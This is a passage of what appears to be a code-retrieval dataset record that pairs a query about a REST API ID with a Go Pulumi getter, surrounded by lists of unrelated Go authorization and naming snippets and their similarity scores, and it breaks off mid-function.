\"/pipe.api.service.webservice.WebService/GetDeployment\":\n\t\treturn isAdmin(r) || isEditor(r) || isViewer(r)\n\tcase \"/pipe.api.service.webservice.WebService/GetStageLog\":\n\t\treturn isAdmin(r) || isEditor(r) || isViewer(r)\n\tcase \"/pipe.api.service.webservice.WebService/GetMe\":\n\t\treturn isAdmin(r) || isEditor(r) || isViewer(r)\n\t}\n\treturn false\n}", "func NewAuthorizator(store di.StoreComponent) *Authorizator {\n\treturn &Authorizator{\n\t\tStoreComponent: store,\n\t}\n}", "func (c *AzureKubeAuth) GetName() string {\n\treturn authConnectTypeKubeConfigAz\n}", "func Author() string {\n\treturn \"[Li Kexian](https://www.likexian.com/)\"\n}", "func Author() string {\n\treturn \"[Li Kexian](https://www.likexian.com/)\"\n}", "func Author() string {\n\treturn \"[Li Kexian](https://www.likexian.com/)\"\n}", "func Author() string {\n\treturn \"[Li Kexian](https://www.likexian.com/)\"\n}", "func Author() string {\n\treturn \"[Li Kexian](https://www.likexian.com/)\"\n}", "func (*SigMentionHandler) Name() string { return \"sig-mention-handler\" }", "func (a Authorizer) Authorize(rw http.ResponseWriter, req *http.Request) error {\n\treturn nil\n}", "func (a Authorizer) Authorize(rw http.ResponseWriter, req *http.Request) error {\n\treturn nil\n}", "func (a *KrakenAPI) DisplayName() string {\n\treturn \"Kraken\"\n}", "func (o SyncAuthorizationOutput) Name() pulumi.StringOutput {\n\treturn o.ApplyT(func(v *SyncAuthorization) pulumi.StringOutput { return v.Name }).(pulumi.StringOutput)\n}", "func (module *Crawler) Author() string {\n\treturn Author\n}", "func (b *BasicAuthenticationBackend) Name() string {\n\treturn b.name\n}", "func (c *Authorize) Help(\n\tctx context.Context,\n) {\n\tout.Normf(\"\\nUsage: \")\n\tout.Boldf(\"warp authorize <username_or_token>\\n\")\n\tout.Normf(\"\\n\")\n\tout.Normf(\" Grants write access to a client of the current warp.\\n\")\n\tout.Normf(\"\\n\")\n\tout.Errof(\" Be extra careful!\")\n\tout.Normf(\" Please make sure that the user you are granting write\\n\")\n\tout.Normf(\" access to is who you think they are. An attacker could take over your machine\\n\")\n\tout.Normf(\" in a split second with write access to one of your warps.\\n\")\n\tout.Normf(\"\\n\")\n\tout.Normf(\" If the username of a user is ambiguous (multiple users connnected with the\\n\")\n\tout.Normf(\" same username), you must use the associated user token, as returned by the\\n\")\n\tout.Boldf(\" state\")\n\tout.Normf(\" command.\\n\")\n\tout.Normf(\"\\n\")\n\tout.Normf(\"Arguments:\\n\")\n\tout.Boldf(\" username_or_token\\n\")\n\tout.Normf(\" The username or token of a connected user.\\n\")\n\tout.Valuf(\" guest_JpJP50EIas9cOfwo goofy\\n\")\n\tout.Normf(\"\\n\")\n\tout.Normf(\"Examples:\\n\")\n\tout.Valuf(\" warp authorize goofy\\n\")\n\tout.Valuf(\" warp authorize guest_JpJP50EIas9cOfwo\\n\")\n\tout.Normf(\"\\n\")\n}", "func (p OIDCFedProvider) Name() string {\n\tif p.OrganizationName != \"\" {\n\t\treturn p.OrganizationName\n\t}\n\treturn p.OpenIDProviderMetadata.Issuer\n}", "func (c Chaos) Name() string { return \"chaos\" }", "func (r *Authorizer) ID() pulumi.IDOutput {\n\treturn r.s.ID()\n}", "func (p *PublisherMunger) Name() string { return \"publisher\" }", "func (mc MSIConfig) Authorizer() (autorest.Authorizer, error) {\n\tmsiEndpoint, err := adal.GetMSIVMEndpoint()\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tspToken, err := adal.NewServicePrincipalTokenFromMSI(msiEndpoint, mc.Resource)\n\tif err != nil {\n\t\treturn nil, fmt.Errorf(\"failed to get oauth token from MSI: %v\", err)\n\t}\n\n\treturn autorest.NewBearerAuthorizer(spToken), nil\n}", "func (c *AmaraProvider) GetName() string {\n\treturn \"amara\"\n}", "func (a *Cataloger) Name() string {\n\treturn \"go-cataloger\"\n}", "func (p Reviewer) CanonicalName() string {\n return \"RegexReviewer\"\n}", "func (c *AdminKubeConfigSignerCertKey) Name() string {\n\treturn \"Certificate (admin-kubeconfig-signer)\"\n}", "func (o *SSHAuthorizationPolicy) GetName() string {\n\n\treturn o.Name\n}", "func (o LicenseGrantAccepterOutput) Name() pulumi.StringOutput {\n\treturn o.ApplyT(func(v *LicenseGrantAccepter) pulumi.StringOutput { return v.Name }).(pulumi.StringOutput)\n}", "func (o ExpressRoutePortAuthorizationOutput) Name() pulumi.StringOutput {\n\treturn o.ApplyT(func(v *ExpressRoutePortAuthorization) pulumi.StringOutput { return v.Name }).(pulumi.StringOutput)\n}", "func (r *Resolver) Author() AuthorResolver { return &authorResolver{r} }", "func (mc MSIConfig) Authorizer() (autorest.Authorizer, error) {\n\tspToken, err := mc.ServicePrincipalToken()\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\treturn autorest.NewBearerAuthorizer(spToken), nil\n}", "func (p scheduleOnHost) name() policyName {\n\treturn scheduleOnHostAnnotationPolicy\n}", "func (p DirectHandler) Name() string { return p.ProviderName }", "func (o LookupAuthorizerResultOutput) AuthorizerUri() pulumi.StringOutput {\n\treturn o.ApplyT(func(v LookupAuthorizerResult) string { return v.AuthorizerUri }).(pulumi.StringOutput)\n}", "func (b *KeystoneAuthenticationBackend) Name() string {\n\treturn b.name\n}", "func (m *MockClusterDescriber) Authorizer() autorest.Authorizer {\n\tm.ctrl.T.Helper()\n\tret := m.ctrl.Call(m, \"Authorizer\")\n\tret0, _ := ret[0].(autorest.Authorizer)\n\treturn ret0\n}", "func (m KafkaPlugin) Author() string {\n\treturn \"François SAMIN <[email protected]>\"\n}", "func (t *LogProviderHandler) Name() string {\n\treturn LogProvider\n}", "func (p *Provider) Name() string {\n\treturn \"linkedin\"\n}", "func (c *APIGateway) GetAuthorizersRequest(input *GetAuthorizersInput) (req *request.Request, output *GetAuthorizersOutput) {\n\top := &request.Operation{\n\t\tName: opGetAuthorizers,\n\t\tHTTPMethod: \"GET\",\n\t\tHTTPPath: \"/restapis/{restapi_id}/authorizers\",\n\t}\n\n\tif input == nil {\n\t\tinput = &GetAuthorizersInput{}\n\t}\n\n\treq = c.newRequest(op, input, output)\n\toutput = &GetAuthorizersOutput{}\n\treq.Data = output\n\treturn\n}", "func (v EcdsaVerifier) Name() string {\n\treturn v.name\n}", "func (r *Resolver) Author() generated.AuthorResolver { return &authorResolver{r} }", "func (Middleware) Name() string {\n\treturn NameIBC\n}", "func (e ENS) Name() string { return \"ens\" }", "func (fva *FunctionVisibilityAnalyzer) Name() string {\n\treturn \"function visibility\"\n}", "func Authorize(obj string, act string, enforcer *casbin.Enforcer) gin.HandlerFunc {\n\treturn func(c *gin.Context) {\n\t\t// Get current user/subject\n\t\tsub, existed := c.Get(\"userID\")\n\t\tif !existed {\n\t\t\tc.AbortWithStatusJSON(401, gin.H{\"msg\": \"User hasn't logged in yet\"})\n\t\t\treturn\n\t\t}\n\n\t\t// Load policy from Database\n\t\terr := enforcer.LoadPolicy()\n\t\tif err != nil {\n\t\t\tc.AbortWithStatusJSON(500, gin.H{\"msg\": \"Failed to load policy from DB\"})\n\t\t\treturn\n\t\t}\n\n\t\t// Casbin enforces policy\n\t\tok, err := enforcer.Enforce(fmt.Sprint(sub), obj, act)\n\n\t\tif err != nil {\n\t\t\tc.AbortWithStatusJSON(500, gin.H{\"msg\": \"Error occurred when authorizing user\"})\n\t\t\treturn\n\t\t}\n\n\t\tif !ok {\n\t\t\tc.AbortWithStatusJSON(403, gin.H{\"msg\": \"You are not authorized\"})\n\t\t\treturn\n\t\t}\n\t\tc.Next()\n\t}\n}", "func (st *Store) Authorized(r *http.Request) (t *Token, err error) {\n\tvar v = r.Context().Value(st.ctxKey)\n\tvar ok bool\n\n\tif nil == v {\n\t\treturn nil, errors.New(\"Authorization Unknown/Not Processed\")\n\t}\n\n\tif t, ok = v.(*Token); ok {\n\t\treturn\n\t}\n\n\tif err, ok = v.(error); ok {\n\t\treturn\n\t}\n\n\treturn\n}", "func AuthorizerExists(id string) (ok bool) {\n\tauthorizerslock.RLock()\n\tdefer authorizerslock.RUnlock()\n\t_, ok = authorizers[id]\n\treturn\n}", "func (e E_OpenconfigAaaTypes_AAA_AUTHORIZATION_EVENT_TYPE) String() string {\n\treturn ygot.EnumLogString(e, int64(e), \"E_OpenconfigAaaTypes_AAA_AUTHORIZATION_EVENT_TYPE\")\n}", "func (c CSRF) Name() string { return c.FieldName }", "func (p *Policy) Name() string {\n\treturn p.InternalName\n}", "func (t *Token) Name() string {\n\tif res, ok := (t.Claims[\"name\"]).(string); ok {\n\t\treturn res\n\t}\n\treturn \"\"\n}", "func (s AuthorizerDescription) String() string {\n\treturn awsutil.Prettify(s)\n}", "func Authorize(w http.ResponseWriter, r *http.Request, authorizer Authorizer) {\n\tauthReq, err := ParseAuthorizeRequest(r, authorizer.Decoder())\n\tif err != nil {\n\t\tAuthRequestError(w, r, authReq, err, authorizer.Encoder())\n\t\treturn\n\t}\n\tif authReq.RequestParam != \"\" && authorizer.RequestObjectSupported() {\n\t\tauthReq, err = ParseRequestObject(r.Context(), authReq, authorizer.Storage(), authorizer.Issuer())\n\t\tif err != nil {\n\t\t\tAuthRequestError(w, r, authReq, err, authorizer.Encoder())\n\t\t\treturn\n\t\t}\n\t}\n\tvalidation := ValidateAuthRequest\n\tif validater, ok := authorizer.(AuthorizeValidator); ok {\n\t\tvalidation = validater.ValidateAuthRequest\n\t}\n\tuserID, err := validation(r.Context(), authReq, authorizer.Storage(), authorizer.IDTokenHintVerifier())\n\tif err != nil {\n\t\tAuthRequestError(w, r, authReq, err, authorizer.Encoder())\n\t\treturn\n\t}\n\tif authReq.RequestParam != \"\" {\n\t\tAuthRequestError(w, r, authReq, oidc.ErrRequestNotSupported(), authorizer.Encoder())\n\t\treturn\n\t}\n\treq, err := authorizer.Storage().CreateAuthRequest(r.Context(), authReq, userID)\n\tif err != nil {\n\t\tAuthRequestError(w, r, authReq, oidc.DefaultToServerError(err, \"unable to save auth request\"), authorizer.Encoder())\n\t\treturn\n\t}\n\tclient, err := authorizer.Storage().GetClientByClientID(r.Context(), req.GetClientID())\n\tif err != nil {\n\t\tAuthRequestError(w, r, req, oidc.DefaultToServerError(err, \"unable to retrieve client by id\"), authorizer.Encoder())\n\t\treturn\n\t}\n\tRedirectToLogin(req.GetID(), client, w, r)\n}", "func (g *Generator) Author() string {\n\treturn g.image.Author\n}", "func (s Authorizer) GoString() string {\n\treturn s.String()\n}", "func (s Authorizer) GoString() string {\n\treturn s.String()\n}", "func (o *IamUserAuthorization) GetName() string {\n\tif o == nil {\n\t\tvar ret string\n\t\treturn ret\n\t}\n\n\treturn o.Name\n}", "func (c *APIGateway) CreateAuthorizerRequest(input *CreateAuthorizerInput) (req *request.Request, output *Authorizer) {\n\top := &request.Operation{\n\t\tName: opCreateAuthorizer,\n\t\tHTTPMethod: \"POST\",\n\t\tHTTPPath: \"/restapis/{restapi_id}/authorizers\",\n\t}\n\n\tif input == nil {\n\t\tinput = &CreateAuthorizerInput{}\n\t}\n\n\treq = c.newRequest(op, input, output)\n\toutput = &Authorizer{}\n\treq.Data = output\n\treturn\n}", "func (t *Token) Name() (string, bool) {\n\tname, ok := t.Claims().Get(\"name\").(string)\n\treturn name, ok\n}", "func (m *MockClusterScoper) Authorizer() autorest.Authorizer {\n\tm.ctrl.T.Helper()\n\tret := m.ctrl.Call(m, \"Authorizer\")\n\tret0, _ := ret[0].(autorest.Authorizer)\n\treturn ret0\n}", "func (g Generator) InvocationName() string {\n\treturn \"action\"\n}" ]
[ "0.77056956", "0.671004", "0.6626713", "0.6626713", "0.63819623", "0.6372522", "0.62091225", "0.61002564", "0.5986317", "0.59525335", "0.5937197", "0.59172904", "0.5893463", "0.5838321", "0.58199275", "0.58056426", "0.5800984", "0.5775594", "0.5717718", "0.5717718", "0.5717718", "0.5673103", "0.5650833", "0.5646093", "0.56085247", "0.55599236", "0.55249226", "0.55212027", "0.55003273", "0.5496983", "0.5453174", "0.544109", "0.54245114", "0.5390302", "0.5387039", "0.5362631", "0.53534067", "0.52813536", "0.52731115", "0.5268006", "0.52460796", "0.52286655", "0.5224157", "0.5224157", "0.5224157", "0.5224157", "0.5224157", "0.5185586", "0.51774275", "0.51774275", "0.5165097", "0.5163314", "0.5155699", "0.5148209", "0.51409113", "0.5140814", "0.5137878", "0.51339304", "0.5127555", "0.5123032", "0.5116177", "0.51142794", "0.5113132", "0.5110272", "0.51024973", "0.51022863", "0.508147", "0.5080979", "0.5073031", "0.50633997", "0.50604725", "0.50527644", "0.50515807", "0.50495696", "0.5042678", "0.5032647", "0.50226355", "0.50223", "0.501634", "0.5014402", "0.50125724", "0.5007571", "0.5000356", "0.49853426", "0.49724066", "0.49705702", "0.4961406", "0.49603873", "0.4946971", "0.4945776", "0.49397212", "0.4938041", "0.49368903", "0.49305156", "0.49305156", "0.4923224", "0.491821", "0.49110568", "0.4909408", "0.49072534" ]
0.60424936
8
The ID of the associated REST API
func (r *Authorizer) RestApi() pulumi.StringOutput { return (pulumi.StringOutput)(r.s.State["restApi"]) }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func (r *Request) ID() string { return string(r.id) }", "func (r *Request) ID() string { return string(r.id) }", "func (r *Response) ID() string { return r.id }", "func (r *Response) ID() string { return r.id }", "func (i *Resource) Id() string {\n\treturn i.data.Id\n}", "func (this *RouterEntry) Id() string {\n\treturn fmt.Sprintf(\"%s:%d\", this.Address, this.JsonPort)\n}", "func (r Resource) ID() string {\n\treturn r.id\n}", "func (f *FFS) ID(ctx context.Context) (ffs.APIID, error) {\n\tresp, err := f.client.ID(ctx, &rpc.IDRequest{})\n\tif err != nil {\n\t\treturn ffs.EmptyInstanceID, err\n\t}\n\treturn ffs.APIID(resp.Id), nil\n}", "func (c *client) ID(ctx context.Context) (IDInfo, error) {\n\turl := c.createURL(\"/id\", nil)\n\n\tvar result IDInfo\n\treq, err := http.NewRequest(\"GET\", url, nil)\n\tif err != nil {\n\t\treturn IDInfo{}, maskAny(err)\n\t}\n\tif ctx != nil {\n\t\treq = req.WithContext(ctx)\n\t}\n\tresp, err := c.client.Do(req)\n\tif err != nil {\n\t\treturn IDInfo{}, maskAny(err)\n\t}\n\tif err := c.handleResponse(resp, \"GET\", url, &result); err != nil {\n\t\treturn IDInfo{}, maskAny(err)\n\t}\n\n\treturn result, nil\n}", "func (doc *Document) ID() string {\n\treturn stringEntry((*doc)[jsonldID])\n}", "func (w *W) ID() string {\n\treturn w.Config.URL\n}", "func ResourceId(w http.ResponseWriter, params martini.Params, m martini.Context) {\n\tid, err := strconv.ParseInt(params[\"id\"], 10, 64)\n\n\tif err != nil || id < 1 {\n\t\thttp.Error(w, \"Unprocessable Entity\", 422)\n\t}\n\n\tm.Map(IdParameter{Id: id})\n}", "func (s *Service) ID() interface{} {\n\treturn (*s)[jsonldID]\n}", "func GetID(w http.ResponseWriter, r *http.Request) {\n\tdata := Data{\n\t\tParam: &Param{\n\t\t\tID: chi.URLParam(r, \"id\"),\n\t\t\tName: r.URL.Query()[\"name\"][0],\n\t\t},\n\t}\n\n\tjsonData, err := json.Marshal(data)\n\tif err != nil {\n\t\tlog.Println(\"error while marshaling: \", err)\n\t}\n\n\tw.Header().Set(\"Content-Type\", \"application/json\")\n\tw.WriteHeader(http.StatusOK)\n\tw.Write(jsonData)\n}", "func (req *Request) Id() uint32 {\n\treturn req.id\n}", "func (h *User) ID(w http.ResponseWriter, r *http.Request) {\n\tid, _ := mux.Vars(r)[\"id\"]\n\tintID, err := strconv.Atoi(id)\n\tif err != nil {\n\t\tR.JSON400(w)\n\t\treturn\n\t}\n\n\tuser, err := h.Storage.GetUser(intID)\n\tif err != nil {\n\t\tlog.Println(err)\n\t\tR.JSON500(w)\n\t\treturn\n\t}\n\n\tif user == nil {\n\t\tR.JSON404(w)\n\t\treturn\n\t}\n\n\tR.JSON200(w, user)\n}", "func ID() int {\n\treturn id\n}", "func (t *RestControllerDescriptor) GetByID() *ggt.MethodDescriptor { return t.methodGetByID }", "func ID() string {\n\treturn appid\n}", "func (auth *Authentication) ID() string {\n\treturn auth.UserID\n}", "func (o UsagePlanApiStageOutput) ApiId() pulumi.StringOutput {\n\treturn o.ApplyT(func(v UsagePlanApiStage) string { return v.ApiId }).(pulumi.StringOutput)\n}", "func (swagger *MgwSwagger) GetID() string {\n\treturn swagger.id\n}", "func getID(r *http.Request) (int64, error) {\n\tvars := mux.Vars(r)\n\treturn strconv.ParseInt(vars[\"id\"], 10, 64)\n}", "func (r ManagedResource) id() ReferenceID { return r.ID }", "func (client *BaseClient) ID() string {\n\treturn client.id\n}", "func (b *ManagedAppRegistrationOperationsCollectionRequestBuilder) ID(id string) *ManagedAppOperationRequestBuilder {\n\tbb := &ManagedAppOperationRequestBuilder{BaseRequestBuilder: b.BaseRequestBuilder}\n\tbb.baseURL += \"/\" + id\n\treturn bb\n}", "func (a *App) ID() string { return a.opts.id }", "func (c *WSClient) ID() string {\n\treturn c.id.String()\n}", "func (c *Client) ID(id string, params ...APIParam) (*MovieInfo, error) {\n\tparams = append(params, APIParam{Name: idParam, Value: id})\n\treturn c.find(params...)\n}", "func (b *CompanyCompanyInformationCollectionRequestBuilder) ID(id string) *CompanyInformationRequestBuilder {\n\tbb := &CompanyInformationRequestBuilder{BaseRequestBuilder: b.BaseRequestBuilder}\n\tbb.baseURL += \"/\" + id\n\treturn bb\n}", "func (m *Command) ID() string { return m.API.Node().ID }", "func (l *Library) ID() int { return l.Library.LibraryID }", "func (s *Service) ID(ctx context.Context, req *IDRequest) (*IDReply, error) {\n\ti, err := s.getInstanceByToken(ctx)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tid := i.ID()\n\treturn &IDReply{ID: id.String()}, nil\n}", "func getRequestID(c *gin.Context) string {\n\tif id := c.Request.Header.Get(\"x-request-id\"); len(id) > 0 {\n\t\treturn id\n\t}\n\treturn uuid.New().String()\n}", "func (b *SynchronizationTemplatesCollectionRequestBuilder) ID(id string) *SynchronizationTemplateRequestBuilder {\n\tbb := &SynchronizationTemplateRequestBuilder{BaseRequestBuilder: b.BaseRequestBuilder}\n\tbb.baseURL += \"/\" + id\n\treturn bb\n}", "func (o MongoDBDatabaseResourceOutput) Id() pulumi.StringOutput {\n\treturn o.ApplyT(func(v MongoDBDatabaseResource) string { return v.Id }).(pulumi.StringOutput)\n}", "func (_this *InterventionReportBody) Id() string {\n\tvar ret string\n\tvalue := _this.Value_JS.Get(\"id\")\n\tret = (value).String()\n\treturn ret\n}", "func (b *AccessReviewInstancesCollectionRequestBuilder) ID(id string) *AccessReviewRequestBuilder {\n\tbb := &AccessReviewRequestBuilder{BaseRequestBuilder: b.BaseRequestBuilder}\n\tbb.baseURL += \"/\" + id\n\treturn bb\n}", "func (sub *Subscription) ID() string {\n return sub.id\n}", "func (r *Request) ID() (i ID, err error) {\n\t// nolint: typecheck\n\tif routable, ok := r.Message.(wrp.Routable); ok {\n\t\ti, err = ParseID(routable.To())\n\t}\n\n\treturn\n}", "func (m *_RepublishResponse) GetIdentifier() string {\n\treturn \"835\"\n}", "func (d *Document) ID() int { return d.Document.DocumentID }", "func (o MongoDBCollectionResourceOutput) Id() pulumi.StringOutput {\n\treturn o.ApplyT(func(v MongoDBCollectionResource) string { return v.Id }).(pulumi.StringOutput)\n}", "func GetBusinessID(c *gin.Context) {\n\tc.JSON(http.StatusOK, gin.H{})\n}", "func (b *CompanyPictureCollectionRequestBuilder) ID(id string) *PictureRequestBuilder {\n\tbb := &PictureRequestBuilder{BaseRequestBuilder: b.BaseRequestBuilder}\n\tbb.baseURL += \"/\" + id\n\treturn bb\n}", "func getUserByIDAPI(w http.ResponseWriter, r *http.Request) {\n\tvars := mux.Vars(r)\n\n\tw.Header().Set(\"Content-Type\", \"application/json\")\n\tuserID, err := strconv.Atoi(vars[\"id\"])\n\tif err != nil {\n\t\tvar newError errorRequest\n\t\tnewError.Error = \"Invalid ID\"\n\t\tw.WriteHeader(http.StatusBadRequest)\n\t\tjson.NewEncoder(w).Encode(newError)\n\t\treturn\n\t}\n\tgetTime(\"GET to: /api/user/\" + strconv.Itoa(userID))\n\tuserNew := getUserByIdDB(userID)\n\tw.WriteHeader(http.StatusOK)\n\tjson.NewEncoder(w).Encode(userNew)\n\n}", "func (y *Yaraus) ID() uint {\n\ty.mu.RLock()\n\tdefer y.mu.RUnlock()\n\treturn uint(y.id)\n}", "func (c *ClaimContent) ID() string {\n\tvar json = jsoniter.ConfigCompatibleWithStandardLibrary\n\tdata, err := json.Marshal(c)\n\tif err != nil {\n\t\treturn \"\"\n\t}\n\t// now simply using sha3.\n\t// TODO change hmac method with algorith\n\tid := sha3.Sum224(data)\n\treturn base64.URLEncoding.EncodeToString(id[:])\n}", "func (__receiver_AService *AvailablePhoneNumberService) ID(id string) *AvailablePhoneNumberService {\n\t__receiver_AService.ResourceID = id\n\tswitch __receiver_AService.action {\n\tcase types.BULKREAD:\n\t\t__receiver_AService.data = struct{}{}\n\t\t__receiver_AService.url = resources.AvailablePhoneNumberURLS[types.READ]\n\t\t__receiver_AService.action = types.READ\n\n\t}\n\treturn __receiver_AService\n}", "func (__receiver_RService *RecordingService) ID(id string) *RecordingService {\n\t__receiver_RService.ResourceID = id\n\tswitch __receiver_RService.action {\n\tcase types.BULKREAD:\n\t\t__receiver_RService.data = struct{}{}\n\t\t__receiver_RService.url = resources.RecordingURLS[types.READ]\n\t\t__receiver_RService.action = types.READ\n\n\t}\n\treturn __receiver_RService\n}", "func (s *Server) ID() string {\n\treturn s.Config().GetUuid()\n}", "func (s *Server) Id() string {\n\treturn s.ID()\n}", "func (b *OrganizationBrandingsCollectionRequestBuilder) ID(id string) *OrganizationalBrandingRequestBuilder {\n\tbb := &OrganizationalBrandingRequestBuilder{BaseRequestBuilder: b.BaseRequestBuilder}\n\tbb.baseURL += \"/\" + id\n\treturn bb\n}", "func getID(w http.ResponseWriter, r *http.Request) (int, error) {\n\n\tvar err error\n\tvar id int\n\n\tids := r.URL.Query().Get(\"id\")\n\n\tif ids != \"\" {\n\n\t\tid, err = strconv.Atoi(ids)\n\n\t\tif err != nil {\n\t\t\tlog.Printf(err.Error())\n\t\t\thttp.Error(w, err.Error(), http.StatusBadRequest)\n\t\t}\n\n\t}\n\n\treturn id, err\n}", "func (fe *BaseFrontEnd) GetId(p string) (id string, err error) {\n\t// Given an absolute path, make it relative to project\n\tif path.IsAbs(p) {\n\t\tp, err = filepath.Rel(fe.ProjectDir, p)\n\t\tif err != nil {\n\t\t\treturn \"\", err\n\t\t}\n\t}\n\tp = strings.Replace(p, string(os.PathSeparator), \"-\", -1)\n\n\t// Remove extention\n\tid = strings.TrimSuffix(p, filepath.Ext(p))\n\n\treturn id, nil\n}", "func (st *ServiceType) id() int {\n\tid, _ := strconv.Atoi(st.ID)\n\treturn id\n}", "func (b *SynchronizationJobsCollectionRequestBuilder) ID(id string) *SynchronizationJobRequestBuilder {\n\tbb := &SynchronizationJobRequestBuilder{BaseRequestBuilder: b.BaseRequestBuilder}\n\tbb.baseURL += \"/\" + id\n\treturn bb\n}", "func (b *ApprovalWorkflowProviderRequestsCollectionRequestBuilder) ID(id string) *RequestObjectRequestBuilder {\n\tbb := &RequestObjectRequestBuilder{BaseRequestBuilder: b.BaseRequestBuilder}\n\tbb.baseURL += \"/\" + id\n\treturn bb\n}", "func GetID(r *http.Request, param string) (primitive.ObjectID, error) {\n\tid := mux.Vars(r)[param]\n\treturn primitive.ObjectIDFromHex(id)\n}", "func (b *CompanyJournalsCollectionRequestBuilder) ID(id string) *JournalRequestBuilder {\n\tbb := &JournalRequestBuilder{BaseRequestBuilder: b.BaseRequestBuilder}\n\tbb.baseURL += \"/\" + id\n\treturn bb\n}", "func GetGoID() int64", "func (d *ImageDoc) GetID() string { return d.ID }", "func (b *CompanyVendorsCollectionRequestBuilder) ID(id string) *VendorRequestBuilder {\n\tbb := &VendorRequestBuilder{BaseRequestBuilder: b.BaseRequestBuilder}\n\tbb.baseURL += \"/\" + id\n\treturn bb\n}", "func (b *PostExtensionsCollectionRequestBuilder) ID(id string) *ExtensionRequestBuilder {\n\tbb := &ExtensionRequestBuilder{BaseRequestBuilder: b.BaseRequestBuilder}\n\tbb.baseURL += \"/\" + id\n\treturn bb\n}", "func (__receiver_OService *OutgoingCallerIDService) ID(id string) *OutgoingCallerIDService {\n\t__receiver_OService.ResourceID = id\n\tswitch __receiver_OService.action {\n\tcase types.BULKREAD:\n\t\t__receiver_OService.data = struct{}{}\n\t\t__receiver_OService.url = resources.OutgoingCallerIDURLS[types.READ]\n\t\t__receiver_OService.action = types.READ\n\n\t}\n\treturn __receiver_OService\n}", "func (q *HTTP) GetID() uint64 {\n\treturn q.id\n}", "func (b *CompanyGeneralLedgerEntriesCollectionRequestBuilder) ID(id string) *GeneralLedgerEntryRequestBuilder {\n\tbb := &GeneralLedgerEntryRequestBuilder{BaseRequestBuilder: b.BaseRequestBuilder}\n\tbb.baseURL += \"/\" + id\n\treturn bb\n}", "func (b *CustomerPictureCollectionRequestBuilder) ID(id string) *PictureRequestBuilder {\n\tbb := &PictureRequestBuilder{BaseRequestBuilder: b.BaseRequestBuilder}\n\tbb.baseURL += \"/\" + id\n\treturn bb\n}", "func getID(w http.ResponseWriter, ps httprouter.Params) (int, bool) {\n\tid, err := strconv.Atoi(ps.ByName(\"id\"))\n\tif err != nil {\n\t\tw.WriteHeader(400)\n\t\treturn 0, false\n\t}\n\treturn id, true\n}", "func (this *AppItem) Id() int64 {\n return this.id\n}", "func (s *Operation) getID() int {\n\treturn s.ID\n}", "func (b *CompanyJournalLinesCollectionRequestBuilder) ID(id string) *JournalLineRequestBuilder {\n\tbb := &JournalLineRequestBuilder{BaseRequestBuilder: b.BaseRequestBuilder}\n\tbb.baseURL += \"/\" + id\n\treturn bb\n}", "func (bv *BaseVSphere) ID() string {\n\treturn fmt.Sprintf(\"%s[%s@%s]\", bv.Type, bv.Name, bv.Endpoint)\n}", "func (n *resPool) ID() string {\n\treturn n.id\n}", "func (b *CompanyShipmentMethodsCollectionRequestBuilder) ID(id string) *ShipmentMethodRequestBuilder {\n\tbb := &ShipmentMethodRequestBuilder{BaseRequestBuilder: b.BaseRequestBuilder}\n\tbb.baseURL += \"/\" + id\n\treturn bb\n}", "func (c *Client) ID() ID {\n\treturn c.id\n}", "func (b *CompanyPaymentMethodsCollectionRequestBuilder) ID(id string) *PaymentMethodRequestBuilder {\n\tbb := &PaymentMethodRequestBuilder{BaseRequestBuilder: b.BaseRequestBuilder}\n\tbb.baseURL += \"/\" + id\n\treturn bb\n}", "func (n Node) Id() int {\n\ts := strings.Split(n.SelfURL, \"/\")\n\tid, err := strconv.ParseInt(s[len(s)-1], 10, 64)\n\tif err != nil {\n\t\treturn -1\n\t}\n\treturn int(id)\n}", "func (b *AccessReviewReviewersCollectionRequestBuilder) ID(id string) *AccessReviewReviewerRequestBuilder {\n\tbb := &AccessReviewReviewerRequestBuilder{BaseRequestBuilder: b.BaseRequestBuilder}\n\tbb.baseURL += \"/\" + id\n\treturn bb\n}", "func (c *ContainerClient) ID() string {\n\treturn c.id\n}", "func (b *PostSingleValueExtendedPropertiesCollectionRequestBuilder) ID(id string) *SingleValueLegacyExtendedPropertyRequestBuilder {\n\tbb := &SingleValueLegacyExtendedPropertyRequestBuilder{BaseRequestBuilder: b.BaseRequestBuilder}\n\tbb.baseURL += \"/\" + id\n\treturn bb\n}", "func (b *PostAttachmentsCollectionRequestBuilder) ID(id string) *AttachmentRequestBuilder {\n\tbb := &AttachmentRequestBuilder{BaseRequestBuilder: b.BaseRequestBuilder}\n\tbb.baseURL += \"/\" + id\n\treturn bb\n}", "func (f *Feed) ID() int64 { return f.id }", "func (obj *SObject) ID() string {\n\treturn obj.StringField(sobjectIDKey)\n}", "func (a *Action) ID() common.ID {\n\tdata := a.ActionName + \":\" + a.ResourceLocation\n\tid := base64.StdEncoding.EncodeToString([]byte(data))\n\treturn common.IDString(id)\n}", "func (a *Attributes) ID() string {\n\treturn a.Get(\"id\")\n}", "func (m *responseErrorWrapper) ID() string {\n\treturn \"ResponseErrorWrapper\"\n}", "func (o GremlinGraphResourceOutput) Id() pulumi.StringOutput {\n\treturn o.ApplyT(func(v GremlinGraphResource) string { return v.Id }).(pulumi.StringOutput)\n}", "func (o GremlinDatabaseResourceOutput) Id() pulumi.StringOutput {\n\treturn o.ApplyT(func(v GremlinDatabaseResource) string { return v.Id }).(pulumi.StringOutput)\n}", "func (b *OrganizationCertificateBasedAuthConfigurationCollectionRequestBuilder) ID(id string) *CertificateBasedAuthConfigurationRequestBuilder {\n\tbb := &CertificateBasedAuthConfigurationRequestBuilder{BaseRequestBuilder: b.BaseRequestBuilder}\n\tbb.baseURL += \"/\" + id\n\treturn bb\n}", "func (b *OrganizationExtensionsCollectionRequestBuilder) ID(id string) *ExtensionRequestBuilder {\n\tbb := &ExtensionRequestBuilder{BaseRequestBuilder: b.BaseRequestBuilder}\n\tbb.baseURL += \"/\" + id\n\treturn bb\n}", "func (b *CompanySalesInvoicesCollectionRequestBuilder) ID(id string) *SalesInvoiceRequestBuilder {\n\tbb := &SalesInvoiceRequestBuilder{BaseRequestBuilder: b.BaseRequestBuilder}\n\tbb.baseURL += \"/\" + id\n\treturn bb\n}", "func (b *InformationProtectionThreatAssessmentRequestsCollectionRequestBuilder) ID(id string) *ThreatAssessmentRequestObjectRequestBuilder {\n\tbb := &ThreatAssessmentRequestObjectRequestBuilder{BaseRequestBuilder: b.BaseRequestBuilder}\n\tbb.baseURL += \"/\" + id\n\treturn bb\n}", "func (api API) UserId() (nickname string, err error) {\n\tbearer, err := api.Authenticator.GetToken(\"code:all\")\n\tif err != nil 